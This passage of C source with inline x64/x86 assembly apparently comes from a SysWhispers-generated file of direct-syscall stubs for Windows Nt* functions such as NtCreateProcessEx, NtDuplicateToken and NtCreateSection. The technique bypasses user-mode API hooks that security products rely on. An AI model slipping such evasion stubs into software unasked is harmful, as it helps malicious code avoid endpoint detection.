        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x0595031B \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtFreeVirtualMemory(
    IN HANDLE ProcessHandle,
    IN OUT PVOID * BaseAddress,
    IN OUT PSIZE_T RegionSize,
    IN ULONG FreeType)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x01932F05 \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x01932F05 \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtCreateFile(
    OUT PHANDLE FileHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN PLARGE_INTEGER AllocationSize OPTIONAL,
    IN ULONG FileAttributes,
    IN ULONG ShareAccess,
    IN ULONG CreateDisposition,
    IN ULONG CreateOptions,
    IN PVOID EaBuffer OPTIONAL,
    IN ULONG EaLength)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x96018EB6 \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x96018EB6 \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtWriteFile(
    IN HANDLE FileHandle,
    IN HANDLE Event OPTIONAL,
    IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
    IN PVOID ApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN PVOID Buffer,
    IN ULONG Length,
    IN PLARGE_INTEGER ByteOffset OPTIONAL,
    IN PULONG Key OPTIONAL)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x24B22A1A \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x24B22A1A \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtCreateProcessEx(
    OUT PHANDLE ProcessHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
    IN HANDLE ParentProcess,
    IN ULONG Flags,
    IN HANDLE SectionHandle OPTIONAL,
    IN HANDLE DebugPort OPTIONAL,
    IN HANDLE ExceptionPort OPTIONAL,
    IN ULONG JobMemberLevel)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x1198E2E3 \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x1198E2E3 \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtQuerySystemInformation(
    IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
    IN OUT PVOID SystemInformation,
    IN ULONG SystemInformationLength,
    OUT PULONG ReturnLength OPTIONAL)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x4A5B2C8F \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x4A5B2C8F \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtDuplicateObject(
    IN HANDLE SourceProcessHandle,
    IN HANDLE SourceHandle,
    IN HANDLE TargetProcessHandle OPTIONAL,
    OUT PHANDLE TargetHandle OPTIONAL,
    IN ACCESS_MASK DesiredAccess,
    IN ULONG HandleAttributes,
    IN ULONG Options)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x9CBFA413 \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x9CBFA413 \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtQueryObject_(
    IN HANDLE Handle,
    IN OBJECT_INFORMATION_CLASS ObjectInformationClass,
    OUT PVOID ObjectInformation OPTIONAL,
    IN ULONG ObjectInformationLength,
    OUT PULONG ReturnLength OPTIONAL)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x0E23F64F \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x0E23F64F \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtWaitForSingleObject(
    IN HANDLE ObjectHandle,
    IN BOOLEAN Alertable,
    IN PLARGE_INTEGER TimeOut OPTIONAL)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x426376E3 \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x426376E3 \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtDeleteFile(
    IN POBJECT_ATTRIBUTES ObjectAttributes)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x64B26A1A \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x64B26A1A \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtTerminateProcess(
    IN HANDLE ProcessHandle OPTIONAL,
    IN NTSTATUS ExitStatus)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x652E64A0 \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x652E64A0 \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtSetInformationProcess_(
    IN HANDLE DeviceHandle,
    IN PROCESSINFOCLASS ProcessInformationClass,
    IN PVOID ProcessInformation,
    IN ULONG Length)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x1D9F320C \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x1D9F320C \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtQueryInformationToken(
    IN HANDLE TokenHandle,
    IN TOKEN_INFORMATION_CLASS TokenInformationClass,
    OUT PVOID TokenInformation,
    IN ULONG TokenInformationLength,
    OUT PULONG ReturnLength)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x27917136 \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x27917136 \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtDuplicateToken(
    IN HANDLE ExistingTokenHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    IN BOOLEAN EffectiveOnly,
    IN TOKEN_TYPE TokenType,
    OUT PHANDLE NewTokenHandle)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x099C8384 \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x099C8384 \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NTAPI NtSetInformationThread(
    IN HANDLE ThreadHandle,
    IN THREADINFOCLASS ThreadInformationClass,
    IN PVOID ThreadInformation,
    IN ULONG ThreadInformationLength)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x1ABE5F87 \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x1ABE5F87 \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtCreateDirectoryObjectEx(
    OUT PHANDLE DirectoryHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    IN HANDLE ShadowDirectoryHandle,
    IN ULONG Flags)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0xBCBD62EA \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0xBCBD62EA \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtCreateSymbolicLinkObject(
    OUT PHANDLE LinkHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    IN PUNICODE_STRING LinkTarget)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x8AD1BA6D \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x8AD1BA6D \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtOpenSymbolicLinkObject(
    OUT PHANDLE LinkHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x8C97980F \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x8C97980F \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtQuerySymbolicLinkObject(
    IN HANDLE LinkHandle,
    IN OUT PUNICODE_STRING LinkTarget,
    OUT PULONG ReturnedLength OPTIONAL)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0xA63A8CA7 \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0xA63A8CA7 \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtCreateSection(
    OUT PHANDLE SectionHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
    IN PLARGE_INTEGER MaximumSize OPTIONAL,
    IN ULONG SectionPageProtection,
    IN ULONG AllocationAttributes,
    IN HANDLE FileHandle OPTIONAL)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0xF06912F9 \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0xF06912F9 \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtOpenThreadToken(
    IN HANDLE ThreadHandle,
    IN ACCESS_MASK DesiredAccess,
    IN BOOLEAN OpenAsSelf,
    OUT PHANDLE TokenHandle)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x73A33918 \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x73A33918 \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtCreateTransaction(
    OUT PHANDLE TransactionHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
    IN LPGUID Uow OPTIONAL,
    IN HANDLE TmHandle OPTIONAL,
    IN ULONG CreateOptions OPTIONAL,
    IN ULONG IsolationLevel OPTIONAL,
    IN ULONG IsolationFlags OPTIONAL,
    IN PLARGE_INTEGER Timeout OPTIONAL,
    IN PUNICODE_STRING Description OPTIONAL)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x7CAB5EFB \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x7CAB5EFB \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtQueryInformationFile(
    IN HANDLE FileHandle,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    OUT PVOID FileInformation,
